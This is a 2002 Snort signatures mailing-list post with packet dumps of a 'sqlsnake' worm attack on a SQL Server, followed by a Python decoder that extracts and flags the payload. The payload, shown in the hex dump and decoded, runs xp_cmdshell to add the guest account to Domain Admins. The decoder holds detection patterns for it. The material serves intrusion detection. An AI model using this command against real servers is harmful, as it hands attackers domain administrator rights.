[Snort-sigs] sqlsnake packet trace

Robert Wagner rwagner at ...447...
Tue May 21 12:11:09 EDT 2002


Here is the initial SQL server attack.  It then tries to open a connection
on 445.


[**] SQL scan [**]
05/21-14:10:56.470487 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6843 IpLen:20 DgmLen:48 DF
******S* Seq: 0x13D81BCB  Ack: 0x0  Win: 0x4000  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK 
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 00 30 1A BB 40 00 72 06 56 9E 0C FB 1B 41 xx xx  .0..@.r.V....A..
0x0020: xx xx 0B 44 05 99 13 D8 1B CB 00 00 00 00 70 02  ...D..........p.
0x0030: 40 00 6B 30 00 00 02 04 05 B4 01 01 04 02        @.k0..........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL scan [**]
05/21-14:10:56.498357 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6844 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x13D81BCC  Ack: 0x910004FC  Win: 0x4470  TcpLen: 20
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 00 28 1A BC 40 00 72 06 56 A5 0C FB 1B 41 xx xx  .(..@.r.V....A..
0x0020: xx xx 0B 44 05 99 13 D8 1B CC 91 00 04 FC 50 10  ...D..........P.
0x0030: 44 70 FD 77 00 00 00 00 00 00 00 00              Dp.w........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL scan [**]
05/21-14:10:56.520779 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6845 IpLen:20 DgmLen:305 DF
***AP*** Seq: 0x13D81BCC  Ack: 0x910004FC  Win: 0x4470  TcpLen: 20
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 01 31 1A BD 40 00 72 06 55 9B 0C FB 1B 41 xx xx  .1..@.r.U....A..
0x0020: xx xx 0B 44 05 99 13 D8 1B CC 91 00 04 FC 50 18  ...D..........P.
0x0030: 44 70 4F F6 00 00 10 01 01 09 00 00 01 00 01 01  DpO.............
0x0040: 00 00 00 00 00 70 00 10 00 00 00 00 00 06 40 0E  .....p........@.
0x0050: 00 00 00 00 00 00 E0 03 10 00 68 01 00 00 09 04  ..........h.....
0x0060: 00 00 56 00 0A 00 6A 00 02 00 00 00 00 00 6E 00  ..V...j.......n.
0x0070: 21 00 B0 00 0C 00 00 00 00 00 C8 00 05 00 D2 00  !...............
0x0080: 00 00 D2 00 00 00 00 02 E3 1D FA 2D D2 00 2F 00  ...........-../.
0x0090: 01 01 00 00 46 00 49 00 4C 00 45 00 53 00 45 00  ....F.I.L.E.S.E.
0x00A0: 52 00 56 00 45 00 52 00 73 00 61 00 4D 00 69 00  R.V.E.R.s.a.M.i.
0x00B0: 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00  c.r.o.s.o.f.t. .
0x00C0: 28 00 72 00 29 00 20 00 57 00 69 00 6E 00 64 00  (.r.). .W.i.n.d.
0x00D0: 6F 00 77 00 73 00 20 00 53 00 63 00 72 00 69 00  o.w.s. .S.c.r.i.
0x00E0: 70 00 74 00 20 00 48 00 6F 00 73 00 74 00 32 00  p.t. .H.o.s.t.2.
0x00F0: 30 00 38 00 2E 00 34 00 34 00 2E 00 31 00 35 00  0.8...4.4...1.5.
0x0100: 39 00 2E 00 36 00 4F 00 4C 00 45 00 44 00 42 00  9...6.O.L.E.D.B.
0x0110: 4E 54 4C 4D 53 53 50 00 01 00 00 00 07 B2 00 A0  NTLMSSP.........
0x0120: 05 00 05 00 2A 00 00 00 0A 00 0A 00 20 00 00 00  ....*....... ...
0x0130: 46 49 4C 45 53 45 52 56 45 52 46 49 45 52 4F     FILESERVERFIERO

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL scan [**]
05/21-14:10:56.609891 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6846 IpLen:20 DgmLen:158 DF
***AP*** Seq: 0x13D81CD5  Ack: 0x91000690  Win: 0x42DC  TcpLen: 20
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 00 9E 1A BE 40 00 72 06 56 2D 0C FB 1B 41 xx xx  ....@.r.V-...A..
0x0020: xx xx 0B 44 05 99 13 D8 1C D5 91 00 06 90 50 18  ...D..........P.
0x0030: 42 DC A7 66 00 00 01 01 00 76 00 00 01 00 65 00  B..f.....v....e.
0x0040: 78 00 65 00 63 00 20 00 78 00 70 00 5F 00 63 00  x.e.c. .x.p._.c.
0x0050: 6D 00 64 00 73 00 68 00 65 00 6C 00 6C 00 20 00  m.d.s.h.e.l.l. .
0x0060: 27 00 6E 00 65 00 74 00 20 00 67 00 72 00 6F 00  '.n.e.t. .g.r.o.
0x0070: 75 00 70 00 20 00 22 00 44 00 6F 00 6D 00 61 00  u.p. .".D.o.m.a.
0x0080: 69 00 6E 00 20 00 41 00 64 00 6D 00 69 00 6E 00  i.n. .A.d.m.i.n.
0x0090: 73 00 22 00 20 00 67 00 75 00 65 00 73 00 74 00  s.". .g.u.e.s.t.
0x00A0: 20 00 2F 00 61 00 64 00 64 00 27 00               ./.a.d.d.'.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL scan [**]
05/21-14:10:56.734529 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6847 IpLen:20 DgmLen:40 DF
***A***F Seq: 0x13D81D4B  Ack: 0x910007C1  Win: 0x41AB  TcpLen: 20
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 00 28 1A BF 40 00 72 06 56 A2 0C FB 1B 41 xx xx  .(..@.r.V....A..
0x0020: xx xx 0B 44 05 99 13 D8 1D 4B 91 00 07 C1 50 11  ...D.....K....P.
0x0030: 41 AB FB F7 00 00 00 00 00 00 00 00              A...........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL scan [**]
05/21-14:10:56.761800 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6848 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x13D81D4C  Ack: 0x910007C2  Win: 0x41AB  TcpLen: 20
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 00 28 1A C0 40 00 72 06 56 A1 0C FB 1B 41 xx xx  .(..@.r.V....A..
0x0020: xx xx 0B 44 05 99 13 D8 1D 4C 91 00 07 C2 50 10  ...D.....L....P.
0x0030: 41 AB FB F6 00 00 00 00 00 00 00 00              A...........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
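The fourth alert above carries the interesting bytes: after the Ethernet, IP and TCP headers sits a TDS packet of type 0x01 (SQL batch) whose body is UTF-16LE text, which is why the ASCII column reads "e.x.e.c. .x.p._.c.m.d.s.h.e.l.l". The following decoder is an added example, not code from the post or from Snort: it parses Snort's "0x0000: hex  ascii" dump format, walks the headers using the IpLen/TcpLen values in the alert, reads the TDS header, and flags the batch text a defender would want alerted on. Assumptions: the dump was taken with link-layer headers (the IP version nibble sits at offset 14, as in this trace), the bytes the poster masked as "xx" are replaced with 0x00 purely to keep offsets intact, and the "net user"/"net localgroup" forms in the second check are a generalisation beyond the "net group" seen here. The sample input is the page's own fourth packet, re-typed here as a constructed string.

```python
"""Decode a Snort packet dump and flag xp_cmdshell inside a TDS SQL batch.

Added example (not from the original post).  Assumes the dump includes a
14-byte Ethernet header; masked 'xx' bytes are treated as 0x00.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: the fourth alert from the trace above (hex copied from
# the post; the 'xx' bytes are the ones the poster masked).
SAMPLE_ALERT = """\
[**] SQL scan [**]
05/21-14:10:56.609891 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6846 IpLen:20 DgmLen:158 DF
***AP*** Seq: 0x13D81CD5  Ack: 0x91000690  Win: 0x42DC  TcpLen: 20
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 00 9E 1A BE 40 00 72 06 56 2D 0C FB 1B 41 xx xx  ....@.r.V-...A..
0x0020: xx xx 0B 44 05 99 13 D8 1C D5 91 00 06 90 50 18  ...D..........P.
0x0030: 42 DC A7 66 00 00 01 01 00 76 00 00 01 00 65 00  B..f.....v....e.
0x0040: 78 00 65 00 63 00 20 00 78 00 70 00 5F 00 63 00  x.e.c. .x.p._.c.
0x0050: 6D 00 64 00 73 00 68 00 65 00 6C 00 6C 00 20 00  m.d.s.h.e.l.l. .
0x0060: 27 00 6E 00 65 00 74 00 20 00 67 00 72 00 6F 00  '.n.e.t. .g.r.o.
0x0070: 75 00 70 00 20 00 22 00 44 00 6F 00 6D 00 61 00  u.p. .".D.o.m.a.
0x0080: 69 00 6E 00 20 00 41 00 64 00 6D 00 69 00 6E 00  i.n. .A.d.m.i.n.
0x0090: 73 00 22 00 20 00 67 00 75 00 65 00 73 00 74 00  s.". .g.u.e.s.t.
0x00A0: 20 00 2F 00 61 00 64 00 64 00 27 00               ./.a.d.d.'.
"""

HEX_LINE = re.compile(r"^0x([0-9A-Fa-f]{4}):\s+(.*)$")
FIELD = re.compile(r"\b(IpLen|TcpLen):\s*(\d+)")
ETHERNET_HEADER_LEN = 14

# TDS packet types from MS-TDS; 0x01 is the one carrying plain-text SQL.
TDS_TYPES = {0x01: "SQL batch", 0x02: "pre-TDS7 login", 0x03: "RPC",
             0x04: "tabular result", 0x10: "TDS7 login", 0x12: "pre-login"}


def parse_snort_dump(alert_text: str) -> Tuple[bytes, Dict[str, int]]:
    """Return (frame bytes, header fields) for one Snort alert block."""
    fields: Dict[str, int] = {}
    frame = bytearray()
    for line in alert_text.splitlines():
        for name, value in FIELD.findall(line):
            fields[name] = int(value)
        m = HEX_LINE.match(line)
        if not m:
            continue
        offset = int(m.group(1), 16)
        if offset != len(frame):  # lines must be contiguous
            raise ValueError(f"dump offset {offset:#06x} does not follow the previous line")
        hex_part = m.group(2).split("  ", 1)[0]  # two spaces separate hex from ASCII
        for tok in hex_part.split():
            frame.append(0 if tok.lower() == "xx" else int(tok, 16))  # 'xx' = masked byte
    return bytes(frame), fields


def tcp_payload(frame: bytes, fields: Dict[str, int]) -> bytes:
    """Skip link-layer, IP and TCP headers; header lengths come from the alert."""
    ip_off = 0 if frame[0] >> 4 == 4 else ETHERNET_HEADER_LEN
    ip_len = fields.get("IpLen", (frame[ip_off] & 0x0F) * 4)
    tcp_off = ip_off + ip_len
    tcp_len = fields.get("TcpLen", (frame[tcp_off + 12] >> 4) * 4)
    return frame[tcp_off + tcp_len:]


def decode_tds(payload: bytes) -> Dict[str, object]:
    """Read the 8-byte TDS header; decode the body as UTF-16LE for SQL batches."""
    if len(payload) < 8:
        return {"type": None, "text": ""}
    ptype, length = payload[0], int.from_bytes(payload[2:4], "big")
    body = payload[8:length]
    text = body.decode("utf-16-le", errors="replace") if ptype == 0x01 else ""
    return {"type": TDS_TYPES.get(ptype, f"unknown 0x{ptype:02x}"), "length": length, "text": text}


def analyse_alert(alert_text: str) -> Dict[str, object]:
    """Decode one alert and list the detection findings a SOC would want."""
    frame, fields = parse_snort_dump(alert_text)
    tds = decode_tds(tcp_payload(frame, fields))
    text = str(tds["text"])
    findings: List[str] = []
    if re.search(r"\bxp_cmdshell\b", text, re.IGNORECASE):
        findings.append("xp_cmdshell called from a SQL batch: OS command execution via the database")
    if re.search(r"\bnet\s+(group|user|localgroup)\b.*/add\b", text, re.IGNORECASE):
        findings.append("account or group membership change via 'net ... /add'")
    return {"tds_type": tds["type"], "sql": text, "findings": findings}


if __name__ == "__main__":
    result = analyse_alert(SAMPLE_ALERT)
    print(result["tds_type"], repr(result["sql"]))
    for finding in result["findings"]:
        print("  !", finding)
```

Running the block on the sample prints the batch text exactly as the worm sent it and both findings; feeding it the third alert instead yields "TDS7 login" and an empty text, which is the expected behaviour for a Login7 packet. A content match on the raw wire bytes would need the UTF-16 form ("78 00 70 00 5F 00 63 00 ..."), which is why a signature written for the ASCII string "xp_cmdshell" would miss this traffic.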
